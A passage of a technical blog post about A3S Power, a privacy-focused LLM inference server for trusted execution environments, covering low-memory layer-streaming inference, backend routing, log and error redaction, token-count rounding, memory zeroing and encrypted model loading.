&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;layer&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="o"&gt;..&lt;/span&gt;&lt;span class="n"&gt;n_layers&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nf"&gt;attention_layer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;hidden&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;layer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pos&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;kv_cache&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rope_table&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nf"&gt;ffn_layer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;hidden&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;layer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;activation&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;tc&lt;/span&gt;&lt;span class="nf"&gt;.release_layer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;gguf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;layer&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;  &lt;span class="c1"&gt;// madvise(DONTNEED) — release physical pages&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Six Key Optimizations on the Hot Path
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;TensorCache&lt;/strong&gt;: All tensor byte slices and types are parsed once at load time into flat arrays. Hot path uses &lt;code&gt;layer * 10 + slot&lt;/code&gt; indexing — zero string formatting, zero HashMap lookups&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ForwardBuffers&lt;/strong&gt;: All working buffers (q, k, v, gate, up, down, normed, logits, scores, attn_out) pre-allocated once. Zero heap allocation during inference&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fused vec_dot&lt;/strong&gt;: Dequantization + dot product in a single pass — no intermediate f32 buffer. Dedicated kernels for Q4_K, Q6_K, Q8_0&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rayon parallel matrix multiply&lt;/strong&gt;: Matrices with more than 64 rows use multi-threaded row parallelism&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;FP16 KV cache&lt;/strong&gt;: Keys and values stored as f16, converted on read. KV cache memory halved&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pre-computed RoPE&lt;/strong&gt;: cos/sin tables built at load time. No transcendental functions on the hot path&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Real-World Memory Comparison
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Model&lt;/th&gt;
&lt;th&gt;Traditional&lt;/th&gt;
&lt;th&gt;picolm Layer-Streaming&lt;/th&gt;
&lt;th&gt;Reduction&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;0.5B Q4_K_M (~350 MB)&lt;/td&gt;
&lt;td&gt;~350 MB&lt;/td&gt;
&lt;td&gt;~15 MB + KV&lt;/td&gt;
&lt;td&gt;23x&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3B Q4_K_M (~2 GB)&lt;/td&gt;
&lt;td&gt;~2 GB&lt;/td&gt;
&lt;td&gt;~60 MB + KV&lt;/td&gt;
&lt;td&gt;33x&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7B Q4_K_M (~4 GB)&lt;/td&gt;
&lt;td&gt;~4 GB&lt;/td&gt;
&lt;td&gt;~120 MB + KV&lt;/td&gt;
&lt;td&gt;33x&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10B Q4_K_M (~6 GB)&lt;/td&gt;
&lt;td&gt;~6 GB&lt;/td&gt;
&lt;td&gt;~125 MB + KV&lt;/td&gt;
&lt;td&gt;48x&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13B Q4_K_M (~7 GB)&lt;/td&gt;
&lt;td&gt;~7 GB&lt;/td&gt;
&lt;td&gt;~200 MB + KV&lt;/td&gt;
&lt;td&gt;35x&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;70B Q4_K_M (~40 GB)&lt;/td&gt;
&lt;td&gt;~40 GB&lt;/td&gt;
&lt;td&gt;~1.1 GB + KV&lt;/td&gt;
&lt;td&gt;36x&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;KV cache uses FP16 storage (half the memory of F32). A 10B model at 2048 context length is about 68 MB.&lt;/p&gt;
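&lt;p&gt;The FP16 figure follows from a simple formula: one K and one V tensor per layer, each holding &lt;code&gt;n_kv_heads × head_dim × ctx_len&lt;/code&gt; f16 values at 2 bytes each. A sketch of the arithmetic; the dimensions in the usage below are illustrative assumptions, not the actual 10B model's (which produce the ~68 MB figure above):&lt;/p&gt;

```rust
// FP16 KV cache footprint in bytes:
//   2 tensors (K and V) per layer
//   × n_kv_heads × head_dim × ctx_len values
//   × 2 bytes per f16 value.
pub fn kv_cache_bytes(n_layers: usize, n_kv_heads: usize, head_dim: usize, ctx_len: usize) -> usize {
    2 * n_layers * n_kv_heads * head_dim * ctx_len * 2
}
```

&lt;p&gt;Two properties fall out directly: halving the context length halves the cache, and storing f16 instead of f32 already halves it again relative to a full-precision cache.&lt;/p&gt;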

&lt;p&gt;&lt;strong&gt;A 10B model under picolm has a peak memory of about 193 MB (125 MB layer weights + 68 MB KV cache), fully runnable in 256 MB of memory.&lt;/strong&gt; This means a $10 edge device, a TEE VM with 256MB EPC, or even a memory-constrained container — all can run a 10B model with genuine semantic understanding capability. This is picolm's core value — not "barely runs," but making privacy inference accessible on any hardware.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why Is a 10B Model Critical? Not Just "Can Run," But "Can Work"
&lt;/h3&gt;

&lt;p&gt;You might ask: wouldn't a small 0.5B model inside the TEE be enough? Why specifically 10B?&lt;/p&gt;

&lt;p&gt;Because 10B is a critical capability threshold. In A3S's security architecture, the LLM inside the TEE doesn't just answer questions — it carries three core security responsibilities:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Responsibility one: Safety Gate.&lt;/strong&gt; In an Agent execution chain, every operation needs security review — does the user's input contain injection attacks? Does the Agent-generated code have malicious behavior? Are the tool call parameters reasonable? These judgments require sufficient language understanding capability. A 0.5B model can do simple keyword matching, but against carefully crafted adversarial inputs (like multi-layered nested prompt injection), its judgment is far from adequate. A 10B model has genuine semantic understanding, capable of identifying complex attack patterns that "look harmless but are actually attempting privilege escalation."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Responsibility two: Data Redaction and Distribution (Privacy Router).&lt;/strong&gt; When sensitive data needs to leave the TEE boundary — such as sending inference results to external services, or writing logs to persistent storage — the data must first be redacted. This isn't simple regex replacement. A text containing "Client [Name], account ending in 8832, holds 500,000 shares of AAPL, unrealized gain $120M" requires the model to understand which parts are retainable public market information (AAPL ticker symbol) and which must be redacted as client privacy ([Name], account number, position size). A 10B model can perform context-aware intelligent redaction, rather than crudely marking the entire text as sensitive. Only redacted data can be safely distributed to downstream systems outside the TEE.&lt;/p&gt;

&lt;p&gt;Here's a concrete example. Suppose an AI Agent needs to query a database for client information to answer an analyst's question:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Analyst query: "Help me find clients with large redemptions in the past week and analyze possible reasons"

Agent executes inside TEE:
┌─────────────────────────────────────────────────────────────────┐
│  TEE encrypted memory (hardware-isolated, unreadable externally) │
│                                                                   │
│  1. Agent calls SQL tool to query database:                       │
│     SELECT name, account_id, amount, fund_name, redeem_date       │
│     FROM redemptions WHERE amount &amp;gt; 1000000                       │
│     AND redeem_date &amp;gt; NOW() - INTERVAL 7 DAY                     │
│                                                                   │
│  2. Database returns raw data (inside TEE, plaintext is safe):    │
│     ┌──────────────────────────────────────────────────────┐      │
│     │ [Client A] | 6621-8832 | $520,000  | Stable Growth A | 02-18│
│     │ [Client B] | 6621-4471 | $380,000  | Tech Pioneer B  | 02-19│
│     │ [Client C] | 6621-9953 | $1,200,000| Stable Growth A | 02-20│
│     └──────────────────────────────────────────────────────┘      │
│                                                                   │
│  3. 10B model analyzes data, generates insight (inside TEE):      │
│     "Stable Growth A fund saw concentrated redemptions            │
│      Feb 18-20, totaling $2.1M across 2 clients.                 │
│      Possible reason: fund NAV declined 3.2%, triggering          │
│      stop-loss thresholds."                                       │
│                                                                   │
│  4. 10B model performs intelligent redaction on output (key step):│
│     ┌──────────────────────────────────────────────────────┐      │
│     │ Retain: fund name (public info), redemption trend,   │      │
│     │         time range, aggregate amount, analysis        │      │
│     │ Redact: client names → [Client A/B/C],               │      │
│     │         account numbers → removed,                    │      │
│     │         individual amounts → fuzzy ranges             │      │
│     └──────────────────────────────────────────────────────┘      │
│                                                                   │
└─────────────────────────────────────────────────────────────────┘
                              │
                              ▼ Redacted data leaves TEE
┌─────────────────────────────────────────────────────────────────┐
│  What the analyst sees:                                           │
│                                                                   │
│  "Stable Growth A fund saw concentrated redemptions Feb 18-20,   │
│   totaling approximately $2M, involving a small number of        │
│   clients. Possible reason: fund NAV declined 3.2%, triggering   │
│   some clients' stop-loss thresholds.                            │
│   Recommend monitoring this fund's liquidity risk."              │
└─────────────────────────────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note the key point in this flow: &lt;strong&gt;the original client names, account numbers, and exact amounts never leave the TEE encrypted memory.&lt;/strong&gt; The analyst gets the business insight they need (which fund is seeing redemptions, possible reasons, risk recommendations), but sees no information that could identify specific clients.&lt;/p&gt;

&lt;p&gt;A 0.5B model can't do this — it can't understand that "[Name]" is a person's name that needs redaction while "Stable Growth A" is a fund name that can be retained. It also can't determine that "$520,000" should be fuzzed to a range rather than completely deleted. This context-aware intelligent redaction requires 10B-level semantic understanding.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Responsibility three: Gatekeeper for Sensitive Tool Calls (Tool Guard).&lt;/strong&gt; AI Agents interact with the external world through tools — executing shell commands, reading/writing files, calling APIs, accessing databases. Some tool calls involve sensitive operations: deleting production data, sending emails, modifying permissions, accessing key management systems. Approval for these operations cannot be delegated to systems outside the TEE (because external systems may be compromised) — it must be done inside the TEE by a model smart enough to judge: "Is this tool call within the authorized scope of the current task? Are the parameters reasonable? Is there a risk of privilege escalation?" A 10B model has the capability to understand complex tool call semantics and make accurate allow/deny decisions in milliseconds.&lt;/p&gt;

&lt;p&gt;These three responsibilities share a common characteristic: &lt;strong&gt;they are all decision points on the security-critical path, where wrong judgments directly lead to data leakage or system compromise.&lt;/strong&gt; Using a 0.5B model for these tasks is like having an intern review nuclear plant safety protocols — capability mismatch. 10B is currently the best balance achievable within TEE memory constraints: powerful enough to handle security decisions, yet small enough to run smoothly in 256MB EPC.&lt;/p&gt;

&lt;p&gt;picolm makes this balance possible. Without layer-streaming inference, you can only run a 0.5B model in 256MB — those security responsibilities would degrade to simple rule matching, easily bypassed by attackers.&lt;/p&gt;

&lt;h3&gt;
  
  
  Auto-Routing: You Don't Need to Manually Choose a Backend
&lt;/h3&gt;

&lt;p&gt;A3S Power doesn't only have picolm as an inference backend. Its architecture defines a key abstraction — the &lt;code&gt;Backend&lt;/code&gt; trait — where any inference engine that implements this trait can be plugged in. Three backends are built in, covering the complete hardware spectrum from $10 edge devices to high-end GPU TEE servers:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Hardware Condition              Auto-selected Backend           Characteristics
──────────────────────────     ─────────────────────────     ──────────────────────────
256MB memory, no GPU            picolm (pure Rust streaming)   O(layer_size) memory, 10B model
(edge device / TEE EPC)

Sufficient memory, no GPU       mistralrs (pure Rust candle)   Full load, faster inference
(standard server / large EPC)   ★ Default backend

GPU TEE environment             llama.cpp (C++ bindings)       GPU acceleration, max throughput
(AMD SEV-SNP GPU TEE)           or mistralrs + CUDA
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means A3S Power isn't a specialized tool that only works under extreme conditions — it's an &lt;strong&gt;inference platform that automatically upgrades with hardware conditions&lt;/strong&gt;. Today you use picolm on a 256MB edge device to run a 10B model for security decisions; tomorrow your TEE server gets a GPU, and the same code and same config automatically switch to the GPU-accelerated backend, boosting inference speed by an order of magnitude or more.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;BackendRegistry&lt;/code&gt; implements TEE-aware auto-routing. &lt;code&gt;find_for_tee()&lt;/code&gt; reads available memory from &lt;code&gt;/proc/meminfo&lt;/code&gt; as an EPC approximation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Model size ≤ 75% EPC → use mistralrs (full load, faster)
Model size &amp;gt; 75% EPC → use picolm (layer-streaming, less memory)
GPU available and backend supports it → prefer GPU-accelerated backend
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The 75% threshold leaves room for working buffers, KV cache, and OS overhead. It's completely transparent to users — just send requests, and the system selects the best backend. In a typical 256MB EPC scenario, a 10B model automatically routes to picolm, while a model small enough to fit within the threshold is fully loaded with mistralrs.&lt;/p&gt;
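&lt;p&gt;The routing rule itself is one comparison. A sketch using integer arithmetic (&lt;code&gt;model ≤ 0.75 × epc&lt;/code&gt; is equivalent to &lt;code&gt;4 × model ≤ 3 × epc&lt;/code&gt;); the names are illustrative, not A3S Power's actual API:&lt;/p&gt;

```rust
// Sketch of the 75% EPC routing rule, avoiding floating point.
#[derive(Debug, PartialEq)]
pub enum BackendChoice {
    Mistralrs, // full load, faster inference
    Picolm,    // layer-streaming, O(layer_size) memory
}

pub fn route_by_epc(model_bytes: u64, epc_bytes: u64) -> BackendChoice {
    // model <= 0.75 * epc  <=>  4 * model <= 3 * epc
    if model_bytes.saturating_mul(4) <= epc_bytes.saturating_mul(3) {
        BackendChoice::Mistralrs
    } else {
        BackendChoice::Picolm
    }
}
```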

&lt;p&gt;And the &lt;code&gt;Backend&lt;/code&gt; trait is open — you can implement your own inference backend (such as integrating TensorRT-LLM or other GPU inference frameworks), register it with &lt;code&gt;BackendRegistry&lt;/code&gt;, and immediately gain all of A3S Power's security capabilities: TEE attestation, model binding, log redaction, encrypted model loading. The security layer and inference layer are completely decoupled.&lt;/p&gt;

&lt;p&gt;That prompt is now being inferred. But during inference, there are some information leakage channels you might not have thought of.&lt;/p&gt;




&lt;h2&gt;
  
  
  6. Logs, Error Messages, Token Counts — Every One Can Betray You
&lt;/h2&gt;

&lt;p&gt;TEE hardware encryption protects data in memory from being read externally. But privacy protection isn't just memory encryption. Logs, metrics, error messages, and even token counts produced by the inference server itself can all become channels for information leakage.&lt;/p&gt;

&lt;p&gt;Let's address each one.&lt;/p&gt;

&lt;h3&gt;
  
  
  Leakage Channel One: Logs
&lt;/h3&gt;

&lt;p&gt;When &lt;code&gt;redact_logs = true&lt;/code&gt;, &lt;code&gt;PrivacyProvider&lt;/code&gt; automatically strips inference content from all log output. Redaction covers 10 sensitive JSON keys:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Key&lt;/th&gt;
&lt;th&gt;Coverage Scenario&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;content&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Chat message content&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;prompt&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Completion request prompt&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;text&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Text output&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;arguments&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Tool call arguments&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;input&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Embedding request input&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;delta&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Streaming delta&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;system&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;System prompt&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;message&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Generic message field&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;query&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Query field&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;instruction&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Instruction field&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;See the effect:&lt;/p&gt;

&lt;p&gt;Before redaction:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"content"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Client [Name], holds 500,000 shares of AAPL..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"model"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"llama3"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After redaction:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"content"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"[REDACTED]"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"model"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"llama3"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Key design decision: redaction executes before log writing, not as post-processing. Sensitive data &lt;strong&gt;never&lt;/strong&gt; appears in log files — even if an attacker gets the log files, they can't recover the inference content.&lt;/p&gt;
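&lt;p&gt;The pre-write redaction pass can be sketched as a scan over the serialized log line: for each sensitive key, the string value that follows is replaced before anything reaches the log sink. Here is a minimal std-only Rust sketch; the function name and matching rules are illustrative, and the real &lt;code&gt;PrivacyProvider&lt;/code&gt; handles nesting and escaped quotes properly:&lt;/p&gt;

```rust
/// Replace the string value following each sensitive key with "[REDACTED]".
/// Illustrative sketch: assumes flat JSON with plain string values and no
/// escaped quotes inside the values being redacted.
fn redact(json: &str, keys: &[&str]) -> String {
    let mut out = json.to_string();
    for key in keys {
        let pat = format!("\"{}\":", key);
        let mut start = 0;
        while let Some(pos) = out[start..].find(&pat) {
            let val_start = start + pos + pat.len();
            // Skip whitespace after the colon, then expect an opening quote.
            let rest = &out[val_start..];
            let ws = rest.len() - rest.trim_start().len();
            let q = val_start + ws;
            if out.as_bytes().get(q) == Some(&b'"') {
                if let Some(end_rel) = out[q + 1..].find('"') {
                    let end = q + 1 + end_rel;
                    out.replace_range(q..=end, "\"[REDACTED]\"");
                    start = q + "\"[REDACTED]\"".len();
                    continue;
                }
            }
            start = val_start;
        }
    }
    out
}

fn main() {
    let line = r#"{"content": "Client X holds 500,000 shares", "model": "llama3"}"#;
    println!("{}", redact(line, &["content", "prompt", "text"]));
}
```

&lt;p&gt;Because this runs before the line is handed to the logger, the plaintext value exists only transiently in memory and never in any file.&lt;/p&gt;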

&lt;h3&gt;
  
  
  Leakage Channel Two: Error Messages
&lt;/h3&gt;

&lt;p&gt;Error messages during LLM inference may contain prompt fragments. For example, a tokenization error might echo part of the prompt content in the error message. The &lt;code&gt;sanitize_error()&lt;/code&gt; function detects and strips these leaks:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Before sanitization: "Tokenization failed for prompt: Client [Name] holds 500,000 shares of AAPL..."
After sanitization:  "Tokenization failed for prompt: [REDACTED]"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It recognizes prefixes like &lt;code&gt;prompt:&lt;/code&gt;, &lt;code&gt;content:&lt;/code&gt;, &lt;code&gt;message:&lt;/code&gt;, &lt;code&gt;input:&lt;/code&gt;, and truncates everything after them.&lt;/p&gt;
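&lt;p&gt;A minimal sketch of that truncation logic (the prefix list and naming here are illustrative, not the exact implementation):&lt;/p&gt;

```rust
/// Truncate an error message after any known content-bearing prefix.
/// Sketch of the idea behind sanitize_error(); A3S Power's actual prefix
/// list and matching rules may differ.
fn sanitize_error(msg: &str) -> String {
    const PREFIXES: [&str; 4] = ["prompt:", "content:", "message:", "input:"];
    for p in PREFIXES {
        if let Some(pos) = msg.find(p) {
            // Keep everything up to and including the prefix, drop the rest.
            return format!("{} [REDACTED]", &msg[..pos + p.len()]);
        }
    }
    msg.to_string()
}

fn main() {
    let e = "Tokenization failed for prompt: Client X holds 500,000 shares";
    println!("{}", sanitize_error(e));
}
```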

&lt;h3&gt;
  
  
  Leakage Channel Three: Token Count Side Channel
&lt;/h3&gt;

&lt;p&gt;This one is easy to overlook. Precise token counts can be used to infer the length and content characteristics of a prompt — this is a side-channel attack.&lt;/p&gt;

&lt;p&gt;When &lt;code&gt;suppress_token_metrics = true&lt;/code&gt;, A3S Power rounds token counts in responses to the nearest 10:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Actual token count: 137 → Returns: 140
Actual token count: 42  → Returns: 40
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Simple, but effective: rounding eliminates the information leaked by precise token counts while retaining enough precision for billing and monitoring.&lt;/p&gt;
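&lt;p&gt;The rounding itself is a one-liner (the function name is illustrative):&lt;/p&gt;

```rust
/// Round a token count to the nearest multiple of 10, as done when
/// suppress_token_metrics = true. Name and signature are illustrative.
fn round_tokens(n: u32) -> u32 {
    ((n + 5) / 10) * 10
}

fn main() {
    assert_eq!(round_tokens(137), 140);
    assert_eq!(round_tokens(42), 40);
}
```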

&lt;h3&gt;
  
  
  Leakage Channel Four: Memory Residue
&lt;/h3&gt;

&lt;p&gt;The inference request is complete, but the prompt and response data may still linger in memory — until overwritten by other data. During this window, memory dump attacks can recover this data.&lt;/p&gt;

&lt;p&gt;A3S Power implements systematic memory zeroing via the &lt;code&gt;zeroize&lt;/code&gt; crate:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;SensitiveString&lt;/code&gt; wrapper&lt;/strong&gt;: All inference content (prompts, responses) is wrapped in &lt;code&gt;SensitiveString&lt;/code&gt;, which automatically zeroes memory on &lt;code&gt;Drop&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;zeroize_string()&lt;/code&gt; and &lt;code&gt;zeroize_bytes()&lt;/code&gt;&lt;/strong&gt;: Helper functions for manual zeroing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;Zeroizing&amp;lt;Vec&amp;lt;u8&amp;gt;&amp;gt;&lt;/code&gt;&lt;/strong&gt;: Decryption buffers for encrypted models use this wrapper; plaintext weights are zeroed immediately after use&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;mlock()&lt;/code&gt; memory locking&lt;/strong&gt;: On Linux, decrypted model weights are locked in physical memory via &lt;code&gt;mlock()&lt;/code&gt;, preventing them from being swapped to disk. &lt;code&gt;munlock()&lt;/code&gt; is called on release&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Even if an attacker captures a memory snapshot after inference completes, they cannot recover the prompt, response, or model weights.&lt;/p&gt;
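&lt;p&gt;The core of the &lt;code&gt;SensitiveString&lt;/code&gt; pattern can be sketched with the standard library alone. Note this is a simplified illustration: the real implementation builds on the &lt;code&gt;zeroize&lt;/code&gt; crate, which also handles compiler fences and reallocation pitfalls that this sketch ignores:&lt;/p&gt;

```rust
use std::ptr;

/// Std-only sketch of the SensitiveString idea: the underlying buffer is
/// overwritten with zeros on Drop, before the allocation is freed.
struct SensitiveString(String);

impl Drop for SensitiveString {
    fn drop(&mut self) {
        // Volatile writes keep the compiler from eliding these "dead" stores.
        unsafe {
            for b in self.0.as_bytes_mut() {
                ptr::write_volatile(b, 0);
            }
        }
    }
}

fn main() {
    let secret = SensitiveString("Client X holds 500,000 shares".to_string());
    // ... use secret.0 during inference ...
    drop(secret); // buffer zeroed here, then freed
}
```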

&lt;p&gt;Four leakage channels, four lines of defense. That prompt's privacy is now comprehensively protected.&lt;/p&gt;

&lt;p&gt;But there's one thing we haven't discussed — the model weights themselves.&lt;/p&gt;




&lt;h2&gt;
  
  
  7. Model Weights Are Also Confidential: Three Encrypted Loading Modes
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: Models Are Intellectual Property
&lt;/h3&gt;

&lt;p&gt;A carefully fine-tuned model may represent millions of dollars of investment and unique competitive advantage. If the model is stored in plaintext on disk, infrastructure operators can easily copy it.&lt;/p&gt;

&lt;h3&gt;
  
  
  How A3S Power Solves It: AES-256-GCM Encrypted Models
&lt;/h3&gt;

&lt;p&gt;A3S Power supports AES-256-GCM encrypted model files (&lt;code&gt;.enc&lt;/code&gt; suffix). The encryption format is &lt;code&gt;[12-byte nonce][AES-256-GCM ciphertext+tag]&lt;/code&gt;. Three decryption modes address different security and performance needs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mode one: DecryptedModel (file mode)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Decrypts ciphertext to a temporary &lt;code&gt;.dec&lt;/code&gt; file. Works with all backends. Performs secure erasure on &lt;code&gt;Drop&lt;/code&gt; — first overwrites file contents with zeros, then deletes the file.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Encrypted file → AES-256-GCM decryption → Temporary .dec file → Backend loads
                                                                    │
                                                              On Drop:
                                                              1. Zero-overwrite file
                                                              2. Delete file
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Mode two: MemoryDecryptedModel (memory mode)&lt;/strong&gt;&lt;/p&gt;

